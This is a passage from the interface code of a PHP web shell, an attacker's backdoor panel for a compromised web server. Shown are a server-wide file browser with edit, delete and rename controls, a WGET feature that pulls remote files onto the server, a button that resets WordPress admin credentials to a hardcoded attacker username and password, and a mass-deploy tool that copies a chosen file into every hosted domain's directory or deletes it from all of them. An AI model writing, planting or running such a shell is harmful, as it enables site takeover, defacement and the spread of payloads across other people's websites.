<?php echo $msg; ?>
</div>
<script>setTimeout(function(){var d=document.querySelector('.notification');if(d)d.remove();},4000);</script>
<?php endif; ?>
<!-- Results Popup -->
<div id="resultsPopup" class="results-popup">
<div class="results-content">
<?php
if (isset($_SESSION['mass_deploy_results'])) {
$r = $_SESSION['mass_deploy_results'];
$sf = $_SESSION['mass_deploy_source'];
$bd = $_SESSION['mass_deploy_base'];
echo '<h3>Mass Deploy Results</h3>';
echo '<p><strong>Source File:</strong> ' . htmlspecialchars($sf) . '</p>';
echo '<p><strong>Base Directory:</strong> ' . htmlspecialchars($bd) . '</p>';
echo '<div style="max-height:400px;overflow-y:auto;border:1px solid #444;padding:10px;background:#2a2a2a;">';
if (isset($r['error'])) {
echo '<p style="color:red;">' . htmlspecialchars($r['error']) . '</p>';
} else {
foreach ($r as $res) {
$c = strpos($res, 'Deployed') !== false ? 'lime' : (strpos($res, 'Failed') !== false ? 'red' : 'yellow');
echo '<p style="color:' . $c . ';margin:2px 0;font-size:12px;">' . htmlspecialchars($res) . '</p>';
}
}
echo '</div>';
unset($_SESSION['mass_deploy_results'], $_SESSION['mass_deploy_source'], $_SESSION['mass_deploy_base']);
}
if (isset($_SESSION['mass_delete_results'])) {
$r = $_SESSION['mass_delete_results'];
$fn = $_SESSION['mass_delete_filename'];
$bd = $_SESSION['mass_delete_base'];
echo '<h3>Mass Delete Results</h3>';
echo '<p><strong>File:</strong> ' . htmlspecialchars($fn) . '</p>';
echo '<p><strong>Base Directory:</strong> ' . htmlspecialchars($bd) . '</p>';
echo '<div style="max-height:400px;overflow-y:auto;border:1px solid #444;padding:10px;background:#2a2a2a;">';
foreach ($r as $res) {
$c = strpos($res, 'Deleted') !== false ? 'lime' : (strpos($res, 'Not found') !== false ? 'yellow' : 'red');
echo '<p style="color:' . $c . ';margin:2px 0;font-size:12px;">' . htmlspecialchars($res) . '</p>';
}
echo '</div>';
unset($_SESSION['mass_delete_results'], $_SESSION['mass_delete_filename'], $_SESSION['mass_delete_base']);
}
if (isset($_SESSION['wp_results'])) {
$r = $_SESSION['wp_results'];
echo '<h3>WordPress Credentials</h3>';
if (isset($r['error'])) {
echo '<div class="error-box"><p style="color:#ff6b6b;font-size:16px;">' . htmlspecialchars($r['error']) . '</p></div>';
} elseif (isset($r['success'])) {
echo '<div class="success-box">';
echo '<p style="color:#4CAF50;font-size:18px;font-weight:bold;">' . htmlspecialchars($r['success']) . '</p>';
echo '<p style="color:#fff;margin:10px 0;"><strong>' . htmlspecialchars($r['creds']) . '</strong></p>';
if (isset($r['url'])) {
echo '<a href="' . htmlspecialchars($r['url']) . '" target="_blank" class="login-link">Login to WordPress</a>';
echo '<p style="color:#ccc;font-size:14px;">Login URL: ' . htmlspecialchars($r['url']) . '</p>';
}
echo '</div>';
}
unset($_SESSION['wp_results']);
}
?>
<div style="text-align:center;margin-top:15px;">
<button class="tool-button" onclick="hidePopup('resultsPopup')">Close</button>
</div>
</div>
</div>
<!-- WGET Popup -->
<div id="wgetPopup" class="popup-overlay">
<div class="popup-content">
<h3>WGET Download</h3>
<p>Enter URL to download file:</p>
<input type="text" id="wgetUrl" placeholder="https://example.com/file.txt" value="https://">
<div style="text-align:center;margin-top:15px;">
<button class="tool-button" onclick="doWget()">Download</button>
<button class="tool-button" onclick="hidePopup('wgetPopup')">Cancel</button>
</div>
</div>
</div>
<!-- WP Popup -->
<div id="wpPopup" class="popup-overlay">
<div class="popup-content">
<h3>WordPress Credentials Changer</h3>
<p>This will change WordPress admin credentials to:</p>
<p style="background:#2a2a2a;padding:10px;border-radius:5px;border:1px solid #444;">
Username: <strong>ReaperBythe222@</strong><br>
Password: <strong>ReaperBythe222@</strong>
</p>
<p style="color:#ccc;font-size:12px;">Current directory: <?php echo htmlspecialchars($d); ?></p>
<div style="text-align:center;margin-top:15px;">
<button class="tool-button" style="background:#4CAF50;border-color:#4CAF50;" onclick="doWpChange()">Change WP Creds</button>
<button class="tool-button" onclick="hidePopup('wpPopup')">Cancel</button>
</div>
</div>
</div>
<!-- Mass Deploy Popup -->
<div id="massDeployPopup" class="popup-overlay">
<div class="popup-content">
<h3>Auto Mass Deploy</h3>
<div style="background:#2a2a2a;border:1px solid #444;border-radius:5px;padding:10px;margin:10px 0;max-height:150px;overflow-y:auto;">
<p>Auto-detected base directory: <?php echo htmlspecialchars($db); ?></p>
<?php
$dm = gd($db);
if (count($dm) === 0) {
echo '<p style="color:red;">No domains found!</p>';
} else {
echo '<p style="color:lime;">Found ' . count($dm) . ' domains</p>';
foreach ($dm as $dmn) {
$ic = is_dir($dmn['path']) ? '✓' : '✗';
$cl = is_dir($dmn['path']) ? '#4CAF50' : '#f44336';
echo '<div style="padding:3px;margin:1px 0;font-size:11px;color:' . $cl . '">' . $ic . ' ' . htmlspecialchars($dmn['name']) . ' -> ' . htmlspecialchars($dmn['path']) . '</div>';
}
}
?>
</div>
<div style="margin:10px 0;padding:10px;background:#2a2a2a;border:1px solid #444;border-radius:5px;">
<p><strong>Custom Base Directory:</strong></p>
<input type="text" id="custom_base_dir" placeholder="/home/db/" value="<?php echo htmlspecialchars($db); ?>" style="width:100%;padding:8px;background:#2a2a2a;border:1px solid #444;border-radius:3px;color:#fff;">
</div>
<p><strong>Select File to Deploy:</strong></p>
<div style="background:#2a2a2a;border:1px solid #444;border-radius:5px;padding:10px;margin:10px 0;max-height:200px;overflow-y:auto;">
<?php
$fl = array();
if (is_dir($d) && $h = opendir($d)) {
while (false !== ($e = readdir($h))) {
if ($e != "." && $e != ".." && !is_dir($d . '/' . $e)) {
$fl[] = $e;
}
}
closedir($h);
}
foreach ($fl as $f) {
echo '<div style="padding:5px;margin:2px 0;background:#333;border-radius:3px;cursor:pointer;font-size:12px;" onclick="selectFile(\'' . htmlspecialchars($f, ENT_QUOTES) . '\')">' . htmlspecialchars($f) . '</div>';
}
?>
</div>
<p><strong>Selected File Path:</strong></p>
<input type="text" id="deploy_file_path" placeholder="/path/to/file.html" readonly>
<div style="text-align:center;margin-top:15px;">
<button class="tool-button" onclick="doMassDeploy()">Deploy to All Domains</button>
<button class="tool-button" onclick="doMassDelete()">Delete from All Domains</button>
<button class="tool-button" onclick="hidePopup('massDeployPopup')">Cancel</button>
</div>
</div>
</div>
<script>
function goDir(dir) {
window.location.href = '?d=' + encodeURIComponent(dir);
}
function deleteFile(path) {
if (confirm('Delete this file?')) {
var f = document.createElement("form");
f.method = "post";
var i = document.createElement("input");
i.name = "del";
i.value = path;
f.appendChild(i);
document.body.appendChild(f);
f.submit();
}
}
function editFile(path) {
var f = document.createElement("form");
f.method = "post";
var i = document.createElement("input");
i.name = "edit";
i.value = path;
f.appendChild(i);
document.body.appendChild(f);
f.submit();
}
function renameFile(path, name) {
var nn = prompt("New name:", name);
if (nn && nn !== name) {
var f = document.createElement("form");
f.method = "post";
var i1 = document.createElement("input");
i1.name = "ren";
i1.value = path;
var i2 = document.createElement("input");
i2.name = "new";
i2.value = nn;
f.appendChild(i1);
f.appendChild(i2);
document.body.appendChild(f);
f.submit();
}
}
function selectFile(filename) {
var divs = document.querySelectorAll('#massDeployPopup div[style*="cursor:pointer"]');
for (var x = 0; x < divs.length; x++) {
divs[x].style.background = '#333';
}
event.target.style.background = '#007acc';
document.getElementById('deploy_file_path').value = '<?php echo addslashes($d); ?>/' + filename;
}
function showPopup(id) {
document.getElementById(id).style.display = 'block';
}
function hidePopup(id) {
document.getElementById(id).style.display = 'none';
}
function doWget() {
var u = document.getElementById('wgetUrl').value;
if (u) {
var f = document.createElement("form");
f.method = "post";
var i = document.createElement("input");
i.name = "wget_url";
i.value = u;
f.appendChild(i);
document.body.appendChild(f);
f.submit();
}
}
function doWpChange() {
var f = document.createElement("form");
f.method = "post";
var i = document.createElement("input");
i.name = "wp_change";
i.value = "1";
f.appendChild(i);
document.body.appendChild(f);
f.submit();
}
function doMassDeploy() {
var f = document.createElement("form");
f.method = "post";
var i1 = document.createElement("input");
i1.name = "deploy_file_path";
i1.value = document.getElementById('deploy_file_path').value;
f.appendChild(i1);
var i2 = document.createElement("input");
i2.name = "mass_deploy";
i2.value = "1";
f.appendChild(i2);
var cbd = document.getElementById('custom_base_dir').value;
if (cbd && cbd.trim() !== '') {
var i3 = document.createElement("input");
i3.name = "custom_base_dir";
i3.value = cbd;
f.appendChild(i3);
}
document.body.appendChild(f);
f.submit();
}
function doMassDelete() {
var f = document.createElement("form");
f.method = "post";
var i1 = document.createElement("input");
i1.name = "deploy_file_path";
i1.value = document.getElementById('deploy_file_path').value;
f.appendChild(i1);
var i2 = document.createElement("input");
i2.name = "mass_delete";
i2.value = "1";
f.appendChild(i2);
var cbd = document.getElementById('custom_base_dir').value;
if (cbd && cbd.trim() !== '') {
var i3 = document.createElement("input");
i3.name = "custom_base_dir";
i3.value = cbd;
f.appendChild(i3);
}
document.body.appendChild(f);
f.submit();
}
// Show results popup if there are results
window.onload = function() {
<?php if (isset($_SESSION['mass_deploy_results']) || isset($_SESSION['mass_delete_results']) || isset($_SESSION['wp_results'])): ?>
document.getElementById('resultsPopup').style.display = 'block';
<?php endif; ?>
};
</script>
<?php
// Display path breadcrumb
$pp = explode("/", $d);
echo "<div class='dir-path'>";
foreach ($pp as $k => $v) {
if ($v == "" && $k == 0) {
echo "<a href='#' onclick='goDir(\"/\")'>/</a>";
continue;
}
$dp = implode("/", array_slice($pp, 0, $k + 1));
echo "<a href='#' onclick='goDir(\"" . addslashes($dp) . "\")'>$v</a>/";
}
echo "</div>";
// Display files
$it = @scandir($d);
if ($it !== false) {
echo "<div class='file-list'>";
foreach ($it as $item) {
$fp = $d . '/' . $item;
if ($item == '.' || $item == '..') continue;
if (is_dir($fp)) {
echo "<div class='file-item folder' onclick='goDir(\"" . addslashes($fp) . "\")' style='cursor:pointer;'>";
echo "<div class='file-icon'>📁</div>";
echo "<div class='file-name'>$item</div>";
echo "<div class='file-size'>--</div>";
echo "<div class='file-actions'>";
echo "<button onclick='event.stopPropagation();renameFile(\"" . addslashes($fp) . "\",\"$item\")'>Rename</button>";
echo "</div>";
echo "</div>";
} else {
$sz = filesize($fp);
$szf = $sz >= 1048576 ? round($sz / 1048576, 2) . ' MB' : ($sz >= 1024 ? round($sz / 1024, 2) . ' KB' : $sz . ' B');
echo "<div class='file-item file'>";
echo "<div class='file-icon'>📄</div>";
echo "<div class='file-name' onclick='window.open(\"" . addslashes($fp) . "\",\"_blank\")' style='cursor:pointer;'>$item</div>";
echo "<div class='file-size'>$szf</div>";
echo "<div class='file-actions'>";
echo "<button onclick='deleteFile(\"" . addslashes($fp) . "\")'>Delete</button>";
echo "<button onclick='editFile(\"" . addslashes($fp) . "\")'>Edit</button>";
echo "<button onclick='renameFile(\"" . addslashes($fp) . "\",\"$item\")'>Rename</button>";
echo "</div>";
echo "</div>";
}
}
echo "</div>";
} else {
echo "<p style='color:red;padding:20px;'>Unable to read directory: $d</p>";
}
// Edit mode
if (isset($_POST['edit'])) {
$fp = $_POST['edit'];
$fd = dirname($fp);
$content = htmlspecialchars(file_get_contents($fp));
echo "<style>.file-list{display:none;}</style>";
echo "<div style='padding:20px;'>";
echo "<a href='#' onclick='goDir(\"" . addslashes($fd) . "\")' style='color:white;text-decoration:none;font-weight:bold;'>← Back</a>";
echo "<h3 style='color:white;margin:15px 0;'>Editing: " . basename($fp) . "</h3>";
echo "<form method='post'>";
echo "<input type='hidden' name='obj' value='" . htmlspecialchars($_POST['edit']) . "'>";
echo "<input type='hidden' name='d' value='" . urlencode($fd) . "'>";
echo "<textarea name='content' style='width:100%;height:500px;background:#1a1a1a;color:#fff;border:1px solid #444;border-radius:5px;padding:15px;font-family:monospace;'>$content</textarea>";
echo "<div style='text-align:center;margin-top:15px;'>";
echo "<button type='submit' name='save' class='tool-button' style='padding:10px 20px;font-size:14px;'>Save File</button>";
echo "</div>";
echo "</form>";
echo "</div>";
}
// Rename mode
if (isset($_POST['ren']) && !isset($_POST['new'])) {
$op = $_POST['ren'];
$od = dirname($op);
echo "<style>.file-list{display:none;}</style>";
echo "<div style='padding:20px;'>";
echo "<a href='#' onclick='goDir(\"" . addslashes($od) . "\")' style='color:white;text-decoration:none;font-weight:bold;'>← Back</a>";
echo "<h3 style='color:white;margin:15px 0;'>Renaming: " . basename($op) . "</h3>";
echo "<form method='post'>";
echo "<input type='hidden' name='ren' value='" . htmlspecialchars($_POST['ren']) . "'>";
echo "<input type='hidden' name='d' value='" . urlencode($od) . "'>";
echo "<p>New Name: <input name='new' type='text' value='" . basename($op) . "' style='color:#000;padding:5px;'></p>";
echo "<input type='submit' value='Rename' class='tool-button' style='padding:10px 20px;font-size:14px;'>";
echo "</form>";
echo "</div>";
}
// Show debug panel
show_debug();
?>
</body>
</html>